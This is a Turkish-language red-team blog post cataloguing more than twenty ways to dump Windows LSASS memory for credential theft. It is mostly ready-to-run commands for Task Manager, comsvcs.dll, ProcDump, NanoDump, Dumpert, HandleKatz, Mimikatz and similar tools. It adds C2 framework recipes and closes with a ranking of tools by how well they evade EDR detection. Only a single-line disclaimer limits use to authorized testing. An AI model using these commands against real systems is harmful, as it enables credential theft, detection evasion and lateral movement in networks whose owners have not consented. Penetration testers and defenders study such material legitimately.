tüm yazılar

LSASS Dump: Kimlik Bilgilerini Elde Etmenin 30+ Yöntemi

LSASS (Local Security Authority Subsystem Service) sürecinden kimlik bilgisi elde etmenin kullanılan tüm araç ve teknikleri — Red Team bakış açısıyla.

LSASS Dump: Kimlik Bilgilerini Elde Etmenin 30+ Yöntemi

Windows ortamlarında gerçekleştirilen sızma testlerinde en kritik adımlardan biri kimlik bilgisi elde etmektir (credential dumping). Bu süreçte hedef alınan temel bileşen ise LSASS (Local Security Authority Subsystem Service) sürecidir.

Bu yazıda; Red Team operasyonlarında ve penetrasyon testlerinde LSASS dump için kullanılan 30'dan fazla araç ve yöntemi kapsamlı biçimde ele alacağım.


LSASS Nedir, Neden Hedef Alınır?

lsass.exe, Windows işletim sisteminde kimlik doğrulama işlemlerini yöneten kritik bir sistem sürecidir. Kullanıcı oturum bilgileri, NTLM hash değerleri, Kerberos biletleri ve açık metin parolalar (belirli koşullar altında) bu sürecin belleğinde tutulur. Bu nedenle bir saldırgan için LSASS belleğine erişmek, ağdaki lateral movement ve privilege escalation için doğrudan bir yol açar.


Dump Yöntemleri

1. Task Manager (GUI — En Basit Yol)

# Lsass PID'ini bul
Powershell -ep bypass
Get-Process lsass

# Task Manager üzerinden dump al
C:\Windows\System32\Taskmgr.exe /dumpfile=C:\lsass.dmp /pid=<LSASS_PID>

En bilinen ve en kolay yöntem. Ancak EDR ürünleri tarafından hemen tespit edilir.


2. comsvcs.dll (LOLBin — Yaygın Kullanım)

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump lsass.exe lsass.dmp full

Windows'un yerleşik DLL'ini kullanır, ekstra araç gerektirmez. Savunma araçları tarafından artık iyi bilinmektedir.


3. MiniDumpWriteDump (Win API)

HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, lsass_pid);
MiniDumpWriteDump(hProcess, lsass_pid, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);

Windows Dbghelp API'si doğrudan kullanılır. Özel araç geliştirme senaryolarında tercih edilir.


4. ProcDump (Sysinternals)

procdump.exe -ma lsass.exe lsass.dmp

Microsoft imzalı meşru bir araçtır. Microsoft'un imzasını taşıdığı için başlangıçta güvenilir gibi görünse de artık çoğu EDR tarafından izlenmektedir.


5. FTK Imager

FTK Imager → Capture Memory → lsass.exe seçilir.

Adli bilişim (forensics) aracı olarak meşruiyeti yüksek, EDR atlatmada etkili olabilir.


6. Volatility (Bellek Analizi)

volatility -f memory_dump.raw --profile=Win7SP1x64 memdump -p <lsass_pid> -D <output_dir>

# Process ağacını görüntüle
volatility -f memory_dump.raw --profile=Win7SP1x64 pstree

Bellek imajından offline LSASS analizi için kullanılır. Özellikle incident response süreçlerinde tercih edilir.


7. WinPmem

winpmem.exe -o dump.raw

Fiziksel belleği diske yazar. Kernel düzeyinde çalışır.


8. Hiberfil.sys

windbg.exe -y srv*c:\symbols*http://msdl.microsoft.com/download/symbols -z C:\hiberfil.sys
!process 0 0 lsass.exe
.dump /ma <lsass_pid> <output_file>

Sistem hazırda bekleme (hibernate) dosyasından LSASS bellek alanını çıkarır.


9. Windows Error Reporting (WER)

HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps
-> DumpType -> 2

Ardından Lsass-Shtinkering.exe tetikleyici aracı çalıştırılır. WER mekanizmasını kötüye kullanarak dump üretir.


10. LiveKD

LiveKd.exe -w
!process 0 0 lsass.exe
.process /p [lsass_PID]
.dump /ma [dump_file_path]

Çalışan sistemi çökertmeden kernel-level dump alınabilir.


11. NanoDump

NanoDump.exe -t [process_ID] -o [output_file_path]

Signature-based tespiti atlatmak için dump'ı parçalara bölerek yazar.


12. Dumpert

Dumpert.exe -k lsass.exe -s -o lsass.dmp

Direct system call kullanarak EDR hook'larını atlar.


13. HandleKatz

HandleKatz.exe -p lsass.exe
HandleKatz.exe -p lsass.exe -o [handle_ID] -dump

LSASS handle'ını klonlayarak dolaylı erişim sağlar, doğrudan LSASS açmadan çalışır.


14. MirrorDump

.\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824

Özel bir LSA plugin DLL'i yükleyerek belleği aynalanmış şekilde çıkarır.


15. SharpMiniDump / MiniDump

SharpMiniDump.exe -p <lsass_process_id> -o lsass.dmp
MiniDump.exe /p <process_id> /o <output_file_name>

.NET tabanlı araçlar, C2 üzerinden execute-assembly ile kullanıma uygundur.


16. LsassSilentProcessExit

LsassSilentProcessExit.exe <PID of LSASS.exe> <DumpMode>

Windows Silent Process Exit mekanizmasını kullanarak LSASS'ı çökertir ve OS'un ürettiği dump dosyasını ele geçirir.


C2 Framework Entegrasyonları

Cobalt Strike

  • SharpDump: execute-assembly SharpDump
  • Mimikatz: mimikatz_command sekurlsa::minidump
  • Schtasks: Zamanlanmış görev ile comsvcs.dll kombinasyonu
  • Sysinternals: load sysinternals → Procexp → File → Save

Metasploit

use post/windows/gather/credentials/lsassy
set SESSION <session_ID>
run

Empire

Modules → credentials/mimikatz/lsass_dump
sekurlsa::minidump

Sliver

use lsass_dump
run

Brute Ratel C4

load kiwi
lsa_dump_sam
lsa_dump_secrets

PoshC2

Get-LsassDumpProcDump           # MiniDumpWriteDump yöntemi
Get-LsassDumpNtQueryVirtualMemory  # NtQueryVirtualMemory yöntemi
Get-LsassDumpBloodHound            # BloodHound entegrasyonu

Covenant + SharpKatz

Create Task → Module → SharpKatz
Arguments → lsa_dump

17. SharpUnhooker + LsassUnhooker

LsassUnhooker.exe -r <output_file_path>
SharpUnhooker.exe inject --process lsass.exe --modulepath ReflectiveDLL.dll
SharpUnhooker.exe dump --process lsass.exe --output lsass_dump.bin

EDR'lerin API hook'larını kaldırarak dump alır. Tespitten kaçınmak için güçlü bir yaklaşım.


18. HashDump Araçları (Çoklu)

Kldumper.exe
laZagne_x64.exe
PwDump7.exe
QuarksPwDump.exe
SqlDumper.exe
Wce_x64.exe
SAMInside.exe

Her biri farklı bir kimlik deposunu (SAM, LSA Secrets, NTDS) hedef alan araçlardır.


19. BetterSafetyKatz

.\BetterSafetyKatz.exe
.\BetterSafetyKatz.exe '.\mimikatz_trunk.zip'
sekurlsa::minidump

Mimikatz'ın derlenmeden bellek üzerinde çalıştırılabilen, obfuscate edilmiş versiyonudur.


20. Mimikatz + Invoke-Obfuscation (PowerShell)

Import-Module PowerSploit
Invoke-Mimikatz -DumpCreds

PowerShell obfuscation katmanlarıyla tespitten kaçınılır. AMSI bypass ile birlikte kullanılır.


Özet

Araçların EDR tespit seviyeleri genel olarak şu şekilde sıralanabilir:

Tespit Riski Yüksek (Hemen Fark Edilir)

  • Task Manager — LSASS handle'ını doğrudan açar, her EDR izler.
  • comsvcs.dll — LOLBin yöntemi, imzası iyi bilinir.
  • ProcDump — Microsoft imzalı olsa da artık izleme listesinde.

Tespit Riski Orta (Bağlama Göre Değişir)

  • WinPmem / FTK Imager — Forensics araçları, bağlama göre şüpheli sayılabilir.
  • Volatility — Genellikle offline analizde kullanılır, aktif tehdit değil.
  • SharpMiniDump / MiniDump — .NET araçları, AMSI tarafından yakalanabilir.

Tespit Riski Düşük (EDR Bypass Odaklı)

  • Dumpert — Direct syscall ile EDR hook'larını atlar.
  • NanoDump — Dump'ı parçalı yazar, imza tabanlı tespiti zorlaştırır.
  • HandleKatz — LSASS'ı doğrudan açmadan handle klonlar.
  • MirrorDump — LSA plugin üzerinden belleği aynar.
  • WER — İşletim sisteminin kendi mekanizmasını kullanır.
  • SharpUnhooker — EDR hook'larını temizler, sonra dump alır.

Bu yazıdaki teknikler yalnızca yetkili penetrasyon testleri ve Red Team operasyonları kapsamında kullanılmalıdır. İzinsiz sistemlere uygulanması yasal suç teşkil eder.

Yeni teknik analizler ve saha notları için takipte kalın!